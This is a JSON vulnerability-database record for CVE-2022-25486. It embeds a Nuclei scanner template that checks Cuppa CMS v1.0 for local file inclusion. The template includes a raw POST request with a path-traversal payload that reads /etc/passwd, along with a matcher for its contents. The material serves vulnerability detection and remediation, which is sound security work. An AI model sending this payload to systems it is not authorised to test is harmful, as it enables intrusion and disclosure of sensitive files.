{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-25486/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-25486/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-25486/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-25486/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-25486/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-25486"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-25486"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-25486.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2022-25486\n\ninfo:\n  name: Cuppa CMS v1.0 - Local File Inclusion\n  author: theamanrawat\n  severity: high\n  description: |\n    CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n  remediation: |\n    Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.\n  reference:\n    - https://github.com/CuppaCMS/CuppaCMS\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-25486\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n    cvss-score: 7.8\n    cve-id: CVE-2022-25486\n    cwe-id: CWE-829\n    epss-score: 0.09966\n    epss-percentile: 0.95431\n    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: cuppacms\n    product: cuppacms\n  tags: cve,cve2022,lfi,cuppa,cuppacms,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /alerts/alertConfigField.php  HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        urlConfig=../../../../../../../../../etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:[x*]:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a004830460221009830fb21833dec1bdd3a9cbc325acc62aefea416b2c5ea03fd5c3a21266f544a022100cea4729e9c246e8453337adaaa14fa8ee25392353cf883fab80d3f5f4c1476cd:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-25486"
}